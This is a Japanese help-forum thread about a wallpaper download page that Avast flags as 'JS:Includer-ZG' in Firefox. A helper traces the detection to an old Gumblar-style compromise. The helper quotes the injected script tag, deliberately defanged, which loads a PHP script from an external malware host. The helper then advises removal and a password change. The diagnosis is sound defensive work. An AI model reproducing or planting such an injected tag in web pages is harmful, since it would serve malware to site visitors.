firefoxでだけ検知される

[REDACTED]

教えて下さい。

ある企画で、作成した壁紙ダウンロードページがあります。
私や友人が開いた限りでは、全く問題なくダウンロードが出来ました。

しかし、アバストを入れているPCで、firefoxで開こうとすると
マルウエア検知され、開けないと連絡がありました。
そこで、私もアバストおよびfirefoxをインストールして、試してみたところ
確かにブロックされて開けません。

ですが、オンラインチェックやほかのウイルスソフトでチェックしても、問題がありませんでした。
chromeで開く際も、アバストのチェックはOKと出て、表示されます。

アバストで出るメッセージは

ブロックした脅威
URL：（該当のページアドレス）
感染： JS:Includer-ZG [Trj]
プロセス：C:\Program Files (x86)\Mozilla Firefox\firefox.exe

となっています。


IEやchromeでは検知されないだけで、URLが不正になっているのでしょうか。
firefoxや、アバストの誤検知なのでしょうか。

本当に問題ないかどうか、その調べる方法、
また、問題ない場合、firefoxを利用している人にどう伝えればいいでしょうか。

サイトは友人に作成してもらったものを、引き継いで運営していますが、
html言語等、構築面は素人です。

すみませんが、宜しくお願い致します。

[NON]

こんばんは promessa さん


問題のページが分からないと何とも言えません。URLを教えてもらえますか？

Firefoxでだけ検知されるとのことですが、ページの埋め込み広告等でブラウザを判定している場合があり、Firefox向けの広告にだけ、何らかのマルウェアが紛れている可能性はあります。

[REDACTED]

NONさん、お返事ありがとうございます。

URLは、

http://www.paseri-densetsu.com/porepore/wallpaper.html

です。
このアドレスを配布したのですが、今のところ、アクセスエラーになったという報告はなく、
アバストを入れたPCを使っている身内が、firefoxで閲覧した際にエラーとなりました。

お手数おかけしますが、宜しくお願い致します。

[REDACTED]

NONさんへ

お世話になっております。みじんこです。
私も該当URLにアクセスしてみましたら感染ブロックという形で出ましたのでご報告させていただきます。

URL: http://www.paseri-densetsu.com/porepore/wallpaper.html|{gzip}
感染: JS:Includer-ZG [Trj]
処理: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

おそらくどのブラウザで開いても、感染はブラウザ.exeなのでしょう。
参考になれば幸いです。

[NON]

ソースコードを調べたところ、5年以上前に流行ったGumblarウイルスのものと思われるスクリプトが紛れ込んでいるようです。
いつ作成されたウェブページでしょうか。

該当するのは、以下に示すソースコード中の2行目の"<script>"タグになります。
誤検知防止のため、意図的にコードを壊してあります。

Code: [Select]

</head>
<s cript src=http://rent.serverf26.com/highslide/letter.php ></script>
<body background="../porepore/images/bk.png"  text="#3366CC" link="#FF3399" vlink="#FF3399" alink="#666666" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages()">

参考
http://d.hatena.ne.jp/hiro-ueda/20100111/1263180526

ウェブサイトのスキャン結果 (9検知/56社)
https://www.virustotal.com/ja/file/93a418781f123105fbd5a700b0f800a15e544eabb4ab8edf4fb4b0dee0769760/analysis/1463061029/


既にウイルスの配布先サーバーは死んでいるので、現状であれば実害はないと思いますが、このスクリプトが入っているということは、
・過去（数年以上前）にウイルスに感染し、ウェブサイトを改竄された
・ウイルスに感染したウェブサイトのソースコードを、それと知らずに流用している
のどちらかかと思います。

Gumblarウイルスは、ウェブサイトのパスワードを盗み出してウェブサイトを改竄し、こういったスクリプトを埋め込む手法で爆発的に感染を拡大させた経緯があります。
もしウェブサイトのパスワードが当時のままであるならば、すぐに変更しておくことをお勧めします。

また、他にもページがあるのであれば、そちらにも同様のものがないか、確認することをお勧めします。

[REDACTED]

NONさん

さっそくにお調べいただきまして、本当にありがとうございました！
教えていただいたscriptを削除したところ、firefooxでも開けました。

URLスキャン結果も、クリーンと出ました。

ただ、virustotalでは、URLの頭にwwwを付けるとクリーンになり
https://www.virustotal.com/ja/url/d67e6d0996217d927a14db43184f01265c37810f482dfc91c20121943513e7e1/analysis/1463091220/

付けないと２つ検知されてしまいます。
https://www.virustotal.com/ja/url/c6179c7b487c91bb64b7c47cd775c05d3cd6e47799deea679294bd1451a75a12/analysis/1463091138/

これは、どういうことなのか、お分かりになりますでしょうか。
ほかのスキャンサイトでは、両方クリーンと出ましたので、大丈夫なのでしょうか。
ネットでの閲覧も、どちらでも問題なく、
firefoxでも、どちらのURLでも開くことが出来ました。


>・過去（数年以上前）にウイルスに感染し、ウェブサイトを改竄された
>・ウイルスに感染したウェブサイトのソースコードを、それと知らずに流用している
>のどちらかかと思います。

これは、どちらも当てはまるように思われますので、ほかのページも早速チェックしてみます！
また、パスワードも変更したいと思います。

[NON]

URLスキャンについては、過去のデータベースを基に判断している場合が多いので、ラグがあるのでしょう。そのうち改善されるかと思います。

>・過去（数年以上前）にウイルスに感染し、ウェブサイトを改竄された
>・ウイルスに感染したウェブサイトのソースコードを、それと知らずに流用している
>のどちらかかと思います。

これは、どちらも当てはまるように思われますので、ほかのページも早速チェックしてみます！
また、パスワードも変更したいと思います。

感染したPCからパスワードを変えても、意味がない場合がありますので、そこはご注意ください。

[REDACTED]

NONさん

そうなんですね。分かりました。
いろいろとありがとうございました。助かりました。
パスワード設定については、別のPCから設定するようにしたいと思います。

また困ったことが起こったら、お邪魔させていただきます。

みじんこさんも、ありがとうございました。

[NON]

また何かありましたらお越しください